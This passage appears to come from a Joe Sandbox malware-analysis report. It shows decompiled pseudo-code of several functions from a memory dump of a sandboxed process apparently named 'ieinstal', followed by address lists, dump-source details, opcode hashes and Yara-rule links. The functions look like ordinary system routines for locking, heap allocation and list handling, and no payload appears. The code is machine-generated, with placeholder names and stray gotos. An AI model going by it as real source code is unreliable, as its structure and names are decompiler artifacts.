										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E1EC52D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                            0x1ec6ef4b
                                                            0x1ec6ef4d
                                                            0x1ec6ef57
                                                            0x1ec6f0bd
                                                            0x1ec6f0c2
                                                            0x1ec6f0d2
                                                            0x1ec6f0d2
                                                            0x1ec6f0c2
                                                            0x1ec6ef5d
                                                            0x1ec6ef5f
                                                            0x1ec6ef67
                                                            0x1ec6ef6a
                                                            0x1ec6ef6d
                                                            0x1ec6ef74
                                                            0x1ec6ef7f
                                                            0x1ec6ef82
                                                            0x1ec6ef82
                                                            0x1ec6ef86
                                                            0x1ec6ef88
                                                            0x1ec6ef8c
                                                            0x1ec6ef8f
                                                            0x1ec6ef8f
                                                            0x1ec6ef8f
                                                            0x00000000
                                                            0x1ec6ef91
                                                            0x1ec6ef93
                                                            0x1ec6efc4
                                                            0x1ec6efc4
                                                            0x1ec6efc4
                                                            0x1ec6efca
                                                            0x1ec6efd0
                                                            0x1ec6f0a6
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec6f0af
                                                            0x1ecbbb06
                                                            0x1ecbbb0a
                                                            0x1ec6f0b5
                                                            0x1ec6f0b5
                                                            0x1ec6f0b5
                                                            0x1ec6f0b5
                                                            0x00000000
                                                            0x1ec6efd6
                                                            0x1ec6efd9
                                                            0x1ec6f0de
                                                            0x1ec6f0e2
                                                            0x1ec6efdf
                                                            0x1ec6efdf
                                                            0x1ec6efdf
                                                            0x1ec6efe5
                                                            0x1ecbbafc
                                                            0x1ecbbafc
                                                            0x1ec6efe5
                                                            0x1ec6efeb
                                                            0x1ec6efed
                                                            0x1ec6f00f
                                                            0x1ec6f011
                                                            0x1ec6f01a
                                                            0x1ec6f01d
                                                            0x1ec6f021
                                                            0x1ec6f028
                                                            0x1ec6f029
                                                            0x1ec6f029
                                                            0x1ec6f02c
                                                            0x00000000
                                                            0x1ec6f02c
                                                            0x1ec6eff3
                                                            0x1ec6eff9
                                                            0x1ec6f0ea
                                                            0x1ec6f0ed
                                                            0x1ec6f0ef
                                                            0x00000000
                                                            0x1ec6f0ef
                                                            0x1ec6f003
                                                            0x1ecbbb12
                                                            0x1ec6f045
                                                            0x1ec6f049
                                                            0x1ec6f051
                                                            0x1ec6f09e
                                                            0x1ec6f0a0
                                                            0x1ec6f0a0
                                                            0x1ec6f09e
                                                            0x1ec6f053
                                                            0x1ec6f064
                                                            0x1ec6f064
                                                            0x1ec6f06b
                                                            0x1ecbbb1a
                                                            0x1ecbbb1a
                                                            0x1ec6f071
                                                            0x1ec6f071
                                                            0x1ec6f07d
                                                            0x1ec6f082
                                                            0x1ec6f08f
                                                            0x1ec6f08f
                                                            0x1ec6f009
                                                            0x1ec6f00d
                                                            0x00000000
                                                            0x1ec6f00d
                                                            0x1ec6efd0
                                                            0x1ec6ef97
                                                            0x1ec6efa5
                                                            0x1ec6efaa
                                                            0x00000000
                                                            0x1ec6efac
                                                            0x1ec6efac
                                                            0x1ec6efac
                                                            0x00000000
                                                            0x1ec6efb2
                                                            0x1ec6f036
                                                            0x1ec6f03a
                                                            0x1ec6f040
                                                            0x1ec6f090
                                                            0x00000000
                                                            0x1ec6f092
                                                            0x1ec6f042
                                                            0x00000000
                                                            0x1ec6f042
                                                            0x1ec6efb7
                                                            0x1ec6efb9
                                                            0x1ec6efbc
                                                            0x1ec6efb0
                                                            0x1ec6efb0
                                                            0x00000000
                                                            0x1ec6efbe
                                                            0x1ec6efbe
                                                            0x1ec6efc1
                                                            0x00000000
                                                            0x1ec6efc1
                                                            0x1ec6efbc
                                                            0x1ec6efaa
                                                            0x1ec6ef91

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                            • Instruction ID: 0119dd7653db15654638324464a95d0cf78fe04642af04f0f936def0e62d7769
                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                            • Instruction Fuzzy Hash: F951C332E14286AFDB00CF66C9D078FBBB2AF09314F5483A9D45557389C375AAC9CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED2740D Relevance: .1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 84%
                                                            			E1ED2740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E1ECAD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E1EC9F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L1EC74620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L1EC74620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E1EC9F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L1EC74620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                            0x1ed2740d
                                                            0x1ed2740d
                                                            0x1ed27412
                                                            0x1ed27413
                                                            0x1ed27416
                                                            0x1ed27418
                                                            0x1ed2741c
                                                            0x1ed2741f
                                                            0x1ed27422
                                                            0x1ed27422
                                                            0x1ed27428
                                                            0x1ed2742a
                                                            0x1ed2742a
                                                            0x1ed27451
                                                            0x1ed27432
                                                            0x1ed2744f
                                                            0x1ed2744f
                                                            0x00000000
                                                            0x1ed27434
                                                            0x1ed27438
                                                            0x1ed27443
                                                            0x1ed27517
                                                            0x1ed27517
                                                            0x1ed2751a
                                                            0x1ed27535
                                                            0x1ed27520
                                                            0x1ed27527
                                                            0x1ed2752c
                                                            0x1ed27531
                                                            0x1ed27533
                                                            0x00000000
                                                            0x1ed27533
                                                            0x00000000
                                                            0x1ed27531
                                                            0x1ed2754b
                                                            0x1ed2754f
                                                            0x1ed2755c
                                                            0x1ed2755c
                                                            0x1ed2755f
                                                            0x1ed27560
                                                            0x1ed27561
                                                            0x1ed27562
                                                            0x1ed27563
                                                            0x1ed27568
                                                            0x1ed2756a
                                                            0x1ed2756c
                                                            0x1ed2756d
                                                            0x1ed2756d
                                                            0x1ed2756f
                                                            0x1ed27572
                                                            0x1ed27574
                                                            0x1ed27577
                                                            0x1ed2757c
                                                            0x1ed2757f
                                                            0x00000000
                                                            0x1ed27551
                                                            0x1ed27551
                                                            0x1ed27551
                                                            0x1ed27553
                                                            0x1ed27553
                                                            0x1ed27449
                                                            0x1ed27449
                                                            0x1ed2744c
                                                            0x1ed2744c
                                                            0x00000000
                                                            0x1ed2744c
                                                            0x1ed27443
                                                            0x1ed2750e
                                                            0x1ed27514
                                                            0x1ed27514
                                                            0x1ed27455
                                                            0x1ed27469
                                                            0x1ed2746d
                                                            0x00000000
                                                            0x1ed27473
                                                            0x1ed27473
                                                            0x1ed27476
                                                            0x1ed27480
                                                            0x1ed27484
                                                            0x1ed2748e
                                                            0x1ed27493
                                                            0x1ed27493
                                                            0x1ed27496
                                                            0x1ed27499
                                                            0x1ed274a1
                                                            0x1ed274b1
                                                            0x1ed274b5
                                                            0x00000000
                                                            0x1ed274bb
                                                            0x1ed274c1
                                                            0x1ed274c1
                                                            0x1ed274c4
                                                            0x1ed274c5
                                                            0x1ed274c6
                                                            0x1ed274c7
                                                            0x1ed274c8
                                                            0x1ed274cd
                                                            0x00000000
                                                            0x1ed274d3
                                                            0x1ed274d3
                                                            0x1ed274d6
                                                            0x1ed274d8
                                                            0x1ed274db
                                                            0x1ed274dd
                                                            0x1ed274e0
                                                            0x1ed274e7
                                                            0x1ed274ee
                                                            0x1ed274ee
                                                            0x1ed274f4
                                                            0x1ed274f9
                                                            0x00000000
                                                            0x1ed274fb
                                                            0x1ed274fb
                                                            0x1ed274fd
                                                            0x1ed27500
                                                            0x1ed27503
                                                            0x1ed27505
                                                            0x1ed27505
                                                            0x1ed274f9
                                                            0x00000000
                                                            0x1ed274cd
                                                            0x1ed274b5
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                            • Instruction ID: c077bcfe6db0f38905686e27dc0d4a35a9d3d2a26b396d12cd18dd275bcedbb5
                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                            • Instruction Fuzzy Hash: 9B517F71600646EFCB15CF64C880A86FBB5FF45308F56C6BAE9089F215E771E986CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC82990 Relevance: .1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 97%
                                                            			E1EC82990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x1ed2ff00);
				E1ECAD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1ec31664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E1EC9E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1ec31668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E1ECD51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x1ec3166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E1EC82AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E1EC66600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E1EC82C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E1EC6EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E1EC82AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E1EC82C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E1EC82ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E1ECAD0D1(_t62);
				goto L28;
			}





















                                                            0x1ec82990
                                                            0x1ec82992
                                                            0x1ec82997
                                                            0x1ec829a3
                                                            0x1ec829a6
                                                            0x1ec829ab
                                                            0x1ec829ad
                                                            0x1ec829b2
                                                            0x1ecc5c80
                                                            0x1ec829b8
                                                            0x1ec829b8
                                                            0x1ec829bb
                                                            0x1ec829c0
                                                            0x1ec829c5
                                                            0x1ec829c6
                                                            0x1ec829c6
                                                            0x1ec829cb
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec829cd
                                                            0x1ec829d0
                                                            0x1ec829d9
                                                            0x1ec829db
                                                            0x1ec829dd
                                                            0x1ec82a7f
                                                            0x1ec82a84
                                                            0x1ec82a87
                                                            0x1ec82a89
                                                            0x1ecc5ca1
                                                            0x1ecc5ca3
                                                            0x00000000
                                                            0x1ec82a8f
                                                            0x1ec82a8f
                                                            0x00000000
                                                            0x1ec82a8f
                                                            0x00000000
                                                            0x1ec829e3
                                                            0x1ec829e3
                                                            0x1ec829e3
                                                            0x00000000
                                                            0x1ec829e3
                                                            0x1ec829dd
                                                            0x00000000
                                                            0x1ec829db
                                                            0x1ec829e6
                                                            0x1ec829e9
                                                            0x1ec829eb
                                                            0x1ec829ed
                                                            0x1ec829f3
                                                            0x1ec829f5
                                                            0x1ec829f8
                                                            0x1ec829fa
                                                            0x1ec82a97
                                                            0x1ec82a9a
                                                            0x1ec82a9d
                                                            0x1ec82add
                                                            0x00000000
                                                            0x1ec82a9f
                                                            0x1ec82aa2
                                                            0x1ec82aa5
                                                            0x1ec82aa8
                                                            0x1ec82aab
                                                            0x1ecc5cab
                                                            0x1ecc5caf
                                                            0x1ecc5cc5
                                                            0x1ecc5cda
                                                            0x1ecc5cdc
                                                            0x1ecc5cdf
                                                            0x1ecc5ce5
                                                            0x00000000
                                                            0x1ecc5ceb
                                                            0x1ecc5ced
                                                            0x1ecc5cee
                                                            0x00000000
                                                            0x1ecc5cee
                                                            0x1ecc5cb1
                                                            0x1ecc5cb4
                                                            0x1ecc5cb9
                                                            0x1ecc5cbb
                                                            0x00000000
                                                            0x1ecc5cbd
                                                            0x1ecc5cbd
                                                            0x00000000
                                                            0x1ecc5cbd
                                                            0x1ecc5cbb
                                                            0x1ec82ab1
                                                            0x1ec82ab1
                                                            0x1ec82ac4
                                                            0x1ec82ac6
                                                            0x1ec82ac6
                                                            0x00000000
                                                            0x1ec82ac6
                                                            0x1ec82aab
                                                            0x00000000
                                                            0x1ec82a00
                                                            0x1ec82a09
                                                            0x1ec82a0e
                                                            0x1ec82a21
                                                            0x1ec82a24
                                                            0x1ec82a35
                                                            0x1ec82a3a
                                                            0x1ec82a3d
                                                            0x1ec82a42
                                                            0x1ec82a59
                                                            0x1ec82a59
                                                            0x1ec82a5c
                                                            0x1ec82a5f
                                                            0x1ec82a5f
                                                            0x1ec829fa
                                                            0x1ec829f3
                                                            0x1ec82a64
                                                            0x1ec82a64
                                                            0x1ec82a6b
                                                            0x1ec82a6b
                                                            0x1ec82a6d
                                                            0x1ec82a72
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6078890318b7d46519caa2ab5de8f98b6218d808d8777e02df321f055a7cb63
                                                            • Instruction ID: 7cfc79bb98bdc1807e01c2fd382abf50fa579ff6fea71be7a589eca49145e0f0
                                                            • Opcode Fuzzy Hash: f6078890318b7d46519caa2ab5de8f98b6218d808d8777e02df321f055a7cb63
                                                            • Instruction Fuzzy Hash: 7F51597690024ADFCF19CF55CE84ECEBBB6BF48B18F118655E810AB254D73199A2CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC84BAD Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 85%
                                                            			E1EC84BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x1ed4d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E1EC5CC50(_t86);
					L11:
					return E1EC9B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1ed48504
				E1EC72280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E1EC9FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E1EC9B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L1EC74620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E1EC5CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1ed48504
								E1EC6FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E1EC84F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                            0x1ec84bad
                                                            0x1ec84bbf
                                                            0x1ec84bc2
                                                            0x1ec84bc6
                                                            0x1ec84bcd
                                                            0x1ec84bd9
                                                            0x1ecc67fe
                                                            0x1ecc6800
                                                            0x1ec84ccc
                                                            0x1ec84ccd
                                                            0x1ec84cb7
                                                            0x1ec84cc9
                                                            0x1ec84cc9
                                                            0x1ec84bdf
                                                            0x1ec84be5
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec84beb
                                                            0x1ec84bef
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec84bf5
                                                            0x1ec84bf9
                                                            0x1ec84c06
                                                            0x1ec84c0b
                                                            0x1ec84c17
                                                            0x1ec84c1c
                                                            0x1ec84c1f
                                                            0x1ec84c25
                                                            0x1ec84c33
                                                            0x1ec84c3d
                                                            0x1ec84c40
                                                            0x1ec84c43
                                                            0x1ec84c47
                                                            0x1ec84c4d
                                                            0x1ec84c53
                                                            0x1ec84c54
                                                            0x1ec84c55
                                                            0x1ec84c56
                                                            0x1ec84c5b
                                                            0x1ec84c5c
                                                            0x1ec84c63
                                                            0x1ec84c6b
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc6776
                                                            0x1ecc6784
                                                            0x1ecc6784
                                                            0x1ecc679f
                                                            0x1ecc67a7
                                                            0x1ecc67af
                                                            0x1ecc67ce
                                                            0x00000000
                                                            0x1ecc67b1
                                                            0x1ecc67b7
                                                            0x1ecc67b8
                                                            0x1ecc67c1
                                                            0x1ecc67d3
                                                            0x1ecc67d9
                                                            0x1ecc67dd
                                                            0x1ec84c94
                                                            0x1ec84c94
                                                            0x1ec84c98
                                                            0x1ec84c9c
                                                            0x1ec84ca3
                                                            0x1ecc67f4
                                                            0x1ecc67f4
                                                            0x1ec84cb5
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec84cb5
                                                            0x1ec84c79
                                                            0x1ec84c7e
                                                            0x1ec84c89
                                                            0x1ec84c8b
                                                            0x1ec84c8f
                                                            0x1ec84c8f
                                                            0x00000000
                                                            0x1ec84c89
                                                            0x1ecc67c3
                                                            0x00000000
                                                            0x1ecc67c3
                                                            0x1ecc67af
                                                            0x1ec84c73
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

